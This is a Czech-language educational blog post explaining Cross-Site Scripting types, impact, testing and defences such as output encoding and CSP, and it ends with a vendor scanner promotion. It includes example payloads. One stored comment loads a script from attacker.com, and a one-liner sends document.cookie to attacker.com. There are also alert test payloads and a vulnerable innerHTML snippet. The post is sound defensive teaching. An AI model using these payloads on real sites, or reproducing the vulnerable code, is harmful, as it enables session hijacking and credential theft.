28. února 2026

Cross-Site Scripting (XSS): Kompletní průvodce touto hrozbou

Cross-Site Scripting (XSS): Kompletní průvodce touto hrozbou

Bylo vám řečeno, že váš moderní webový framework se stará o bezpečnost, ale stále máte nepříjemný pocit. Je vaše aplikace *skutečně* chráněna před jednou z nejstarších a nejtrvalejších hrozeb webu? Když vám na stůl přistane zpráva o vysoce závažné zranitelnosti, vysvětlit managementu riziko útoku typu Cross-Site Scripting (xss) v reálném světě se může zdát jako nemožný úkol. Tato běžná zranitelnost se často ztrácí v technickém žargonu, takže týmy si nejsou jisté, jak nejlépe chránit své uživatele a jejich data.

Tato obsáhlá příručka je tu proto, aby vnesla světlo do tohoto zmatku. Srozumitelně a na praktických příkladech vysvětlíme, jak fungují útoky XSS, a rozebereme klíčové rozdíly mezi zranitelnostmi typu Reflected, Stored a DOM-based. Získáte jistotu k implementaci efektivních, vrstvených obran – od správného kódování výstupu až po zvládnutí Content Security Policies. Na konci budete vybaveni znalostmi a nástroji k nalezení, opravě a prevenci těchto zranitelností a k budování bezpečnějších webových aplikací od základů.

Klíčové body

  • Pochopte základní mechanismy útoku, kdy útočník lstí přiměje váš web k doručování škodlivého kódu nic netušícímu uživateli.
  • Naučte se rozlišovat mezi třemi hlavními typy – Reflected, Stored a DOM-based – abyste identifikovali největší rizika vaší aplikace.
  • Pochopte dopad úspěšného útoku v reálném světě, od únosu relace a krádeže přihlašovacích údajů až po znehodnocení webu.
  • Objevte kontrolní seznam základních technik prevence pro vývojáře, protože vrstvená obrana je jediný způsob, jak účinně zastavit xss.

Jak fungují útoky XSS: Vysvětlení základních mechanismů

Ve své podstatě je útok Cross-Site Scripting (XSS) podvod. Představte si důvěryhodný web jako spolehlivého posla. Útočník najde způsob, jak tohoto posla oklamat, aby doručil škodlivý balíček – část škodlivého JavaScript kódu – nic netušícímu uživateli. Když webový prohlížeč uživatele obdrží tento balíček, vidí, že pochází z důvěryhodného webu, a bez otázek spustí kód, čímž ohrozí uživatelovu bezpečnost.

Tento vztah tvoří klasický trojúhelník útočník-oběť-web. Útočník necílí přímo na server webu; místo toho zneužije zranitelnost na webu k doručení payloadu do prohlížeče oběti.

Pro lepší pochopení tohoto konceptu se podívejte na toto užitečné video:

Webové prohlížeče jsou postaveny na základním bezpečnostním principu nazývaném Same-Origin Policy, který zabraňuje skriptům z jednoho webu přistupovat k datům na jiném webu. Tato politika znamená, že váš prohlížeč implicitně důvěřuje všem skriptům obsluhovaným z domény, kterou navštěvujete. Zranitelnost Cross-site Scripting (XSS) tuto důvěru narušuje. Vložením neautorizovaného kódu do legitimní webové stránky útočník zajistí, že škodlivý skript bude vypadat, že pochází z důvěryhodného zdroje, a získá tak plný přístup k datům tohoto webu v prohlížeči uživatele.

Proč se to jmenuje 'Cross-Site' Scripting?

Název pochází z prvních útoků typu proof-of-concept, kdy skript na škodlivém webu útočníka mohl interagovat s a ovládat zranitelný web otevřený v jiném okně nebo rámu, doslova překračující hranici "site". Zatímco mnoho moderních útoků xss je obsaženo v rámci jedné zranitelné stránky (např. prostřednictvím škodlivého odkazu nebo uloženého komentáře), původní název se zachoval jako průmyslově standardní termín pro tento typ zranitelnosti injektáže kódu na straně klienta.

Cíl útočníka: Od žertu po zisk

To, co se kdysi mohlo používat k jednoduchým žertům, jako je zobrazení vyskakovacího okna s upozorněním, se vyvinulo v seriózní nástroj pro kyberzločince. Konečným cílem je téměř vždy kompromitovat uživatelský účet nebo data pro finanční zisk nebo další zneužití. Mezi běžné cíle patří:

  • Únos relace: Krádež souborů cookie relace uživatele k jeho napodobení a získání neoprávněného přístupu k jeho účtu.
  • Krádež přihlašovacích údajů: Použití falešných přihlašovacích formulářů nebo keyloggerů k zachycení uživatelských jmen, hesel a dalších citlivých informací.
  • Phishing: Přesměrování uživatelů na škodlivý web ovládaný útočníkem za účelem získání osobních údajů.
  • Znehodnocení webu: Změna obsahu webové stránky za účelem zobrazení neautorizovaných zpráv nebo obrázků, což poškozuje pověst webu.

Tři hlavní typy XSS: Příklady a scénáře

Zranitelnosti Cross-Site Scripting nejsou monolit; jsou kategorizovány podle toho, jak je škodlivý payload doručen a spuštěn. Tři primární typy jsou Reflected, Stored a DOM-based XSS. I když se jejich mechanismy liší, potenciální dopad – od únosu relace po krádež dat – je vážný bez ohledu na typ. Je také běžné, že jedna aplikace je zranitelná vůči více formám útoků xss.

Typ Uložení Payloadu Způsob doručení
Reflected XSS Neukládá se; odráží se serverem Škodlivý odkaz (např. e-mail, sociální média)
Stored XSS Trvale uloženo na serveru Vloženo do databáze (např. komentáře, profily)
DOM-based XSS Neukládá se; existuje v kódu na straně klienta Fragmenty URL nebo manipulace s daty na straně klienta

Reflected XSS (Non-Persistent)

Při útoku Reflected XSS je škodlivý skript odeslán na webový server, obvykle prostřednictvím parametru URL, a poté odražen do prohlížeče uživatele. Payload není uložen na serveru, takže je "non-persistent". Útočník často lstí přiměje uživatele, aby klikl na vytvořený odkaz, jako je vyhledávací dotaz obsahující skript:

https://example-shop.com/search?q=<script>alert('Vaše relace byla kompromitována');</script>

Když oběť klikne na tento odkaz, server zahrne skript do odpovědi a prohlížeč jej spustí.

Stored XSS (Persistent)

Stored XSS je často nejnebezpečnější typ, protože škodlivý skript je trvale uložen na cílovém serveru, například v databázi. Každý uživatel, který si prohlédne infikovanou stránku, se stane obětí. Běžným scénářem je, že útočník zveřejní škodlivý komentář na blogu:

<p>Skvělý příspěvek! <script src="http://attacker.com/cookie-stealer.js"></script></p>

Server uloží tento komentář a skript se spustí v prohlížeči každého dalšího návštěvníka, čímž potenciálně ukradne jeho soubory cookie relace.

DOM-based XSS

DOM-based XSS nastane, když zranitelnost existuje výhradně v kódu na straně klienta. Server není přímo zapojen; aplikace nebezpečně zpracovává data ze zdroje ovladatelného uživatelem, jako je fragment URL, a zapisuje je do Document Object Model (DOM). To je běžné v moderních Single-Page Applications (SPA). Například JavaScript, který přebírá jméno z hashe URL a vkládá ho do stránky, je zranitelný:

const user = window.location.hash.substring(1); document.getElementById('greeting').innerHTML = 'Ahoj, ' + user;

Dopad v reálném světě: Co vlastně může útočník udělat?

Zranitelnost Cross-Site Scripting je mnohem víc než jen teoretická chyba; je to mocný vstupní bod pro útočníky, aby kompromitovali uživatelské účty a manipulovali s důvěryhodnými weby. Protože se škodlivý skript spouští v kontextu důvěryhodné domény, dědí oprávnění a přístup k citlivým datům této domény. Toto zásadní porušení důvěry je to, co činí útok xss tak nebezpečným.

Historie je plná příkladů velkých platforem, od MySpace po eBay, které se staly obětí XSS. Tyto incidenty ukazují, že dopad se pohybuje od rozsáhlých žertů až po vážné narušení dat. Cíle útočníka lze kategorizovat do několika klíčových oblastí:

Únos relace a napodobování

Když se přihlásíte, web dá vašemu prohlížeči soubor cookie relace, aby si vás pamatoval. Tento soubor cookie je klíčem k vašemu účtu. Útočník může vložit skript, aby jej ukradl, často jediným řádkem kódu, jako je <script>document.location='http://attacker.com/log?c=' + document.cookie;</script>. Jakmile mají váš soubor cookie, mohou jej umístit do svého prohlížeče a získat plný přístup k vaší relaci – není potřeba žádné heslo. Mohou číst vaše zprávy, měnit vaše nastavení nebo zahajovat transakce, jako byste to byli vy.

Krádež přihlašovacích údajů a phishing

XSS umožňuje vysoce přesvědčivé phishingové útoky. Místo toho, aby vás nalákal na falešnou doménu, může útočník:

  • Vložit skript, který vytvoří falešný přihlašovací formulář přímo na legitimním webu.
  • Zachytit přihlašovací údaje, které zadáte, protože formulář se odesílá na jeho server.
  • Použít keyloggerový skript k zaznamenávání každého stisknutí kláves na kompromitované stránce.

Protože je URL v adresním řádku prohlížeče správná a důvěryhodná, uživatelé se mnohem snáze nechají oklamat, aby prozradili své uživatelské jméno a heslo.

Znehodnocení webu a šíření malwaru

V některých případech je cílem útočníka poškodit pověst značky. Mohou použít XSS ke změně obsahu webu a nahradit jej vlastními zprávami nebo obrázky. Ještě nebezpečnější je, že mohou proměnit důvěryhodný web ve zbraň. Vložením škodlivého skriptu mohou uživatele tiše přesměrovat na stránku, která hostí malware nebo spustí "drive-by download", čímž infikují počítač uživatele bez jeho vědomí. Váš web se tak neúmyslně stane distribučním centrem pro kybernetické hrozby.

Jak najít a testovat zranitelnosti XSS

Než budete moci předcházet Cross-Site Scripting, musíte nejprve identifikovat, kde je vaše aplikace zranitelná. Robustní testovací strategie je zásadní pro odhalení potenciálních chyb xss a ochranu vašich uživatelů předtím, než se škodlivý kód dostane do produkce. Nejúčinnější přístup kombinuje dvě klíčové metody: pečlivé ruční testování a škálovatelné automatizované skenování. Integrace těchto kontrol do vašeho CI/CD pipeline zajišťuje, že bezpečnost je kontinuální proces, nikoli jednorázová událost.

Techniky ručního testování

Ruční testování zahrnuje bezpečnostního profesionála, který aktivně zkoumá aplikaci, zda neobsahuje slabiny. Pomocí vývojářských nástrojů prohlížeče můžete kontrolovat DOM a manipulovat s JavaScriptem v reálném čase. Cílem je odeslat škodlivé payloady do vstupních polí – jako jsou vyhledávací panely, uživatelské profily nebo formuláře pro komentáře – a sledovat, zda je aplikace spouští. Je důležité zkontrolovat, jak se váš vstup odráží v různých kontextech, jako jsou HTML tagy, atributy elementů nebo existující bloky JavaScriptu.

Mezi běžné payloady pro testování patří:

  • <script>alert('XSS')</script> - Klasický proof-of-concept.
  • <img src=x onerror=alert(1)> - Payload, který se spouští v rámci obslužné rutiny události HTML.
  • <svg/onload=alert(document.domain)> - Alternativní vektor pomocí SVG elementů.

Pro pokročilejší analýzu vám proxy nástroje jako Burp Suite nebo OWASP ZAP umožňují zachytávat, upravovat a přehrávat HTTP požadavky, což vám dává granulární kontrolu nad daty odesílanými na server.

Automatizované skenování zranitelností

I když je ruční testování výkonné, je časově náročné, vyžaduje hluboké znalosti a neškáluje se v rozsáhlých moderních aplikacích. Zde vynikají automatizované skenery. Tyto nástroje systematicky procházejí vaši webovou aplikaci a testují každý endpoint, parametr a vstupní pole na tisíce variant zranitelností mnohem rychleji a konzistentněji, než by to kdy dokázal člověk.

Moderní skenery s umělou inteligencí se integrují přímo do vašeho vývojového workflow a poskytují vývojářům okamžitou zpětnou vazbu v rámci jejich stávajících nástrojů. Používají inteligentní analýzu k odhalení komplexních, zřetězených a uložených zranitelností XSS, které tradiční metody často přehlédnou. Automatizací procesu objevování se váš tým může soustředit na nápravu, nikoli na detekci. Podívejte se, jak Penetrify automaticky detekuje XSS během několika minut.

Jak předcházet XSS: Kontrolní seznam obrany pro vývojáře

Neexistuje žádné jediné zázračné řešení pro zastavení Cross-Site Scripting. Robustní obrana proti xss vyžaduje vrstvený bezpečnostní přístup, který kombinuje několik doplňkových technik. Implementací následujících strategií můžete výrazně snížit útočnou plochu vaší aplikace.

Kódování výstupu: Primární obrana

Základním pravidlem prevence XSS je zacházet se všemi daty od uživatelů nebo externích zdrojů jako s nedůvěryhodnými. Před vykreslením těchto dat v prohlížeči musíte neutralizovat všechny potenciálně škodlivé znaky prostřednictvím kontextového kódování výstupu. To znamená, že data kódujete různě v závislosti na tom, kam budou umístěna: uvnitř HTML tagů, v HTML atributech, v JavaScriptu nebo v URL.

  • Používejte: Důvěryhodné, dobře udržované knihovny pro kódování. Například v PHP použijte vestavěnou funkci: htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');
  • Nepokoušejte se: Psát vlastní funkce kódování nebo sanitace. Je snadné přehlédnout okrajové případy, které mohou útočníci zneužít.

Content Security Policy (CSP): Moderní ochrana

Content Security Policy (CSP) je výkonná bezpečnostní vrstva na úrovni prohlížeče. Je to hlavička HTTP odpovědi, která dává prohlížeči pokyn, aby načítal zdroje (jako jsou skripty, obrázky a styly) pouze z explicitně povolených zdrojů. I když útočník úspěšně vloží škodlivý skript, správná CSP zabrání prohlížeči v jeho spuštění.

Příklad hlavičky CSP: Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;

Tato politika říká prohlížeči, aby důvěřoval pouze zdrojům ze stejného původu ('self') a aby spouštěl skripty pouze z vlastní domény a důvěryhodného CDN.

Frameworky a postupy bezpečného kódování

Moderní webové frameworky jako React, Angular a Vue mají vestavěnou ochranu proti XSS. Automaticky kódují data vykreslená v zobrazení, což bezpečně řeší většinu případů použití. Vývojáři však mohou tyto ochrany neúmyslně obejít.

  • Používejte: Funkce výchozího datového vázání vašeho frameworku.
  • Nepoužívejte: Potenciálně nebezpečné funkce, jako je React’s dangerouslySetInnerHTML nebo Angular's bypassSecurityTrustHtml, aniž byste plně rozuměli rizikům a nejprve sanitovali vstup.
  • Aktualizujte: Všechny frameworky, knihovny a závislosti, abyste zajistili, že máte nejnovější bezpečnostní záplaty.

Zabudování těchto obranných vrstev do vašeho vývojového životního cyklu je kritické. Proaktivní prevence a pravidelné bezpečnostní testování jsou základními kameny udržování bezpečné aplikace.

Od zranitelnosti k bdělosti: Zabezpečení vaší aplikace

Pochopení Cross-Site Scripting je prvním zásadním krokem v obraně proti němu. Prozkoumali jsme, jak útočníci zneužívají uživatelský vstup, odlišné mechanismy uložených, odražených a útoků založených na DOM a závažný dopad, který mohou mít na vaše uživatele a pověst. Klíčem k prevenci je vícevrstvá obrana, od důsledné validace vstupu po kontextově uvědomělé kódování výstupu. Proaktivní identifikace a oprava jakékoli chyby xss není jen osvědčený postup; je to nezbytné pro moderní webovou bezpečnost.

Ale ruční kontroly často nestačí. Nenechte XSS číhat ve vašem kódu. Získejte bezplatnou automatizovanou bezpečnostní kontrolu s Penetrify. Naše skenování s umělou inteligencí najde to, co ostatní přehlédnou, a poskytuje nepřetržité monitorování vašeho vývojového pipeline. Detekcí všech zranitelností OWASP Top 10 vám umožňujeme vytvářet a nasazovat s jistotou.

Převezměte kontrolu nad zabezpečením vaší aplikace a začněte budovat odolnější a důvěryhodnější digitální zážitek ještě dnes.

Často kladené otázky

Jaký je rozdíl mezi XSS a CSRF (Cross-Site Request Forgery)?

XSS (Cross-Site Scripting) a CSRF (Cross-Site Request Forgery) zneužívají prohlížeč uživatele, ale různými způsoby. XSS vloží škodlivý kód do důvěryhodného webu, který se pak spustí v prohlížeči uživatele. To umožňuje útočníkům krást data, jako jsou soubory cookie relace. CSRF na druhé straně lstí přiměje prohlížeč ověřeného uživatele k odeslání neúmyslného, škodlivého požadavku webové aplikaci, jako je změna hesla nebo provedení nákupu bez souhlasu uživatele.

Je XSS i v roce 2026 s moderními webovými frameworky stále vážný problém?

Ano, XSS zůstává významnou hrozbou i s moderními frameworky, jako je React nebo Angular. I když mají tyto frameworky vestavěnou ochranu, jako je automatické kódování výstupu, nejsou neomylné. Vývojáři mohou tyto funkce neúmyslně deaktivovat nebo zavést zranitelnosti nesprávným použitím určitých funkcí. Pečlivé bezpečnostní postupy, včetně kontrol kódu a penetračního testování, jsou stále nezbytné k zabránění tomu, aby se zranitelnosti xss proklouzly do produkčních aplikací a způsobily bezpečnostní incidenty.

Zabraňuje používání HTTPS útokům XSS?

Ne, HTTPS nezabraňuje útokům XSS. HTTPS šifruje data přenášená mezi prohlížečem uživatele a webovým serverem, čímž je chrání před odposlechem nebo útoky man-in-the-middle. Útok XSS však vloží škodlivý kód přímo do odezvy aplikace. HTTPS poslušně zašifruje a doručí tento škodlivý payload do prohlížeče stejně, jako by to udělal s jakýmkoli legitimním obsahem. Prevence XSS vyžaduje validaci vstupu a kódování výstupu na straně serveru, nejen zabezpečení transportní vrstvy.

Může útok XSS ukrást informace z počítače uživatele?

Útok XSS funguje v rámci bezpečnostního sandboxu prohlížeče a nemůže přímo přistupovat k souborům v místním počítači uživatele. Může však ukrást jakékoli informace, ke kterým má samotný prohlížeč přístup pro daný konkrétní web. To zahrnuje citlivá data, jako jsou soubory cookie relace, ověřovací tokeny a veškeré osobní údaje zadané do formulářů na kompromitované stránce. Ukradením souboru cookie relace může útočník často zcela napodobit uživatele a převzít jeho účet.

Jak pomáhá Web Application Firewall (WAF) předcházet XSS?

Web Application Firewall (WAF) poskytuje kritickou obrannou vrstvu kontrolou příchozího HTTP provozu na přítomnost škodlivých vzorů. Používá sadu pravidel k identifikaci a blokování známých útočných vektorů XSS, jako jsou požadavky obsahující podezřelé skriptové tagy nebo obslužné rutiny událostí JavaScriptu, než se vůbec dostanou do vaší aplikace. I když WAF nenahrazuje postupy bezpečného kódování, je vysoce účinný při filtrování běžných, automatizovaných útoků a ochraně před známými zranitelnostmi.

Jsou API také zranitelné vůči útokům XSS?

Ano, API mohou být vektorem pro uložené útoky XSS. Pokud API endpoint přijímá a ukládá data dodaná uživatelem bez řádné sanitace, mohou tato data obsahovat škodlivý skript. Když klientská aplikace, jako je single-page aplikace, později načte a vykreslí tato data bez jejich zakódování, skript se spustí v prohlížeči koncového uživatele. Zabezpečení API vyžaduje stejné přísné principy validace vstupu a kódování výstupu jako tradiční webové aplikace, aby se zabránilo xss.

Back to Blog